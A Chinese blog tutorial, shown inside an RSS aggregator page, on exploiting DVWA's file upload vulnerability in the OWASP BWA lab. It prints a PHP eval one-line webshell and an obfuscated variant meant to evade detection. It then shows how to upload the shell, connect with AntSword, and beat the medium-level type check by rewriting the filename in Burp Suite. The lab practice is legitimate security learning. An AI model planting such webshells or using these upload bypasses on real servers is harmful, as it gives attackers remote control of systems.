惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

SecWiki News
SecWiki News
阮一峰的网络日志
阮一峰的网络日志
WordPress大学
WordPress大学
Stack Overflow Blog
Stack Overflow Blog
Google DeepMind News
Google DeepMind News
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
T
Tailwind CSS Blog
www.infosecurity-magazine.com
www.infosecurity-magazine.com
The Last Watchdog
The Last Watchdog
S
Securelist
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
T
Tor Project blog
Hacker News - Newest:
Hacker News - Newest: "LLM"
H
Help Net Security
Attack and Defense Labs
Attack and Defense Labs
O
OpenAI News
博客园 - 聂微东
Y
Y Combinator Blog
N
News | PayPal Newsroom
IT之家
IT之家
C
Cybersecurity and Infrastructure Security Agency CISA
Engineering at Meta
Engineering at Meta
L
LangChain Blog
L
Lohrmann on Cybersecurity
Recent Commits to openclaw:main
Recent Commits to openclaw:main
有赞技术团队
有赞技术团队
Hugging Face - Blog
Hugging Face - Blog
C
CERT Recently Published Vulnerability Notes
爱范儿
爱范儿
P
Palo Alto Networks Blog
T
Threat Research - Cisco Blogs
N
News and Events Feed by Topic
G
Google Developers Blog
PCI Perspectives
PCI Perspectives
The Register - Security
The Register - Security
H
Heimdal Security Blog
V
Visual Studio Blog
F
Fortinet All Blogs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Jina AI
Jina AI
TaoSecurity Blog
TaoSecurity Blog
博客园 - Franky
T
The Blog of Author Tim Ferriss
AI
AI
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
博客园 - 叶小钗
The Hacker News
The Hacker News
U
Unit 42
Security Latest
Security Latest
The GitHub Blog
The GitHub Blog

猫涅的秘密结社

关于就职的思考 hackthissite-org 数据库原理相关 关于在与我互动前你可能需要了解的事 信安roadmap 个人主页开发汇报 六级生词速记本——附考后感想 数据结构C++自学相关 NewStarCTF-2025 三款steam付费番茄钟软件测评 夏令营-ai hello-world qt环境下的c++程序编写 新新的年 qq机器人配置二三事 搞点java 读书笔记-当下的力量 网页小修时间 glibc更新记录 Vulhub在线靶场记录 Vulhub记录(旧的) 神奇脚本在哪里-CTF之Pwn BaseCTF高校联合新生赛2024 逆逆逆逆逆向-CTF之reverse 求解 夺旗时间 学学学 渗透测试相关 协议/漏洞/网络 最新的知识点 数据分析相关 zico2解析 OverTheWire-bandit解析 CTF实战相关2 靶机解析-gigachad ctf实战相关1 复习time 开学季 维修时间 小小修整 学校实训-笔记 每周靶机之Beelzebub 读书笔记-如何阅读一本书 DC-4解析 DC-2解析 每周靶机之ted 靶机-DC-1 每周靶机之bob potato解析 xss跨站点脚本攻击 每周靶机之Tommyboy1dot0 owasp命令执行漏洞 owasp文件包含漏洞 每周靶机之WALLABY'S-NIGHTMARE Hackademic.RTB1 owasp与sql注入与sqlmap liunx中sudo服务相关知识 liunx中ssh服务相关知识 moneybox解析 C语言相关1 关于加入aplayer的方式 再来一次 关于在next7.8.0中建设评论功能这件事 目前的进展 编辑小提示
owasp上传漏洞
nirvana_felis · 2023-11-24 · via 猫涅的秘密结社

owasp下载地址:
https://sourceforge.net/projects/owaspbwa/files/
注:如遇dvwa无法更改难度 多半为cookie所致 请随以下教程删除网站的缓存:请点这里

文件上传是 Web 应用的必备功能之一,比如上传头像显示个性化、上传附件共享文件、上传脚本更新网站。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件、exe 程序等,这就造成了文件上传漏洞。

我们先从一句话木马说起

1.一句话木马

<?php @eval($_POST['123']);?>
这便是最简单的一句话木马。
这段php代码被分为以下几个部分:
**@**表示后面即使执行错了,也不会报错。
**eval()**函数表示将括号里的内容当作代码执行。
$_POST[‘123’]表示从页面中获得123这个参数值。
也就是说,该页面只要收到了
123
这个密码,就会按照eval()的逻辑去运行。
只要了解了该文件的路径,便可以对该机器(利用菜刀或蚁剑)为所欲为了。
一句话木马还有很多变种:

1
2
3
4
5
6
<?php @assert($\_REQUEST[123]); ?> // GET 数据从url提交
POST 数据采用隐蔽方式提交
REQUEST即支持GET方式、又支持POST方式
<?php $k="ass"."ert"; $k($\_REQUSET['123']);?>
//利用字符串绕过检测的一句话木马
....以下略

2.渗透过程

owasp下载地址:
https://sourceforge.net/projects/owaspbwa/files/

低等级(Security=low)

我们先通过右下角的view source按钮来观察网页代码 寻找规律
1
可以看到该网站并没有对上传的文件类型与大小做较为明显的防备
漏洞很大
那么我们创建一个1.php 在其中加上代码<?php @eval($_POST['123']);?>
2
随后登陆网站 上传 完事
3
至于kali下载蚁剑的方式:参考资料
我们打开蚁剑 按照网页所给提示 文件被上传在了
http://192.168.246.132/dvwa/hackable/uploads/1.php
url地址中填入前者 在连接密码中填入123
测试链接 然后按保存
测试链接显示成功其实就已经完事了
4
随后研究蚁剑 你便会发现它的功能全备 非常厉害

中等级 (Security=medium)

我们先通过DVWA Security将安全度调整至medium
5
然后继续进入上传漏洞网页 view source
6
可以看到这次的上传对上传的文件类型上传的文件大小做了限制
文件类型限制为jpeg文件 大小限制在了100000byte以内(1KB=1024B byte=B=字节)
文件大小由于使用一句话木马 因此可以轻松解决
文件类型的问题则可以使用多种方法来解析

1)利用burpsuite

关于burpsuite的配置
7
proxy-proxy setting中设置本地地址与端口
8
9
配置firefox中的设置-proxy settings 注意ip与端口要与前者保持一致
10
进入上传漏洞的网页 按这个按钮就能开始监听
先分析一下刚才得到的条件:
文件类型仅限jpeg
那我们便将一句话木马.php文件的后缀更改为jpeg交给前端 通过burpsuite更改后缀来修改成php文件类型
那么开始实践
11
1.php复制一份备份 其中一份更名为1.jpeg
开启burpsuite的监听 将1.jpeg上传至网站 等待拦截结果
12
网站一直处于加载中 且burpsuite显示拦截结果 说明成功拦截
我们将filename=“1.jpeg”更改为filename=“1.php”
随后点击forward放行
14
15
可以看到上传成功 我们继续在蚁剑里测试
16
好的 链接也成功了 这说明目标已完成